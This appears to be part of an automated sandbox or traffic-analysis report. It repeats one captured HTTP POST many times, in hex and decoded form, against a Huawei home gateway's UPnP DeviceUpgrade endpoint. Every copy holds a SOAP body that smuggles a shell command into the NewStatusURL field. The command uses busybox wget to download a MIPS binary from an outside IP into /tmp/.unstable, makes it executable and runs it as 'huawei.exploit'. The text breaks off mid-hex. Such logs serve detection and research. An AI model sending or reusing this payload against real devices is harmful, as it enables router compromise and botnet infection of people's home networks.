67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 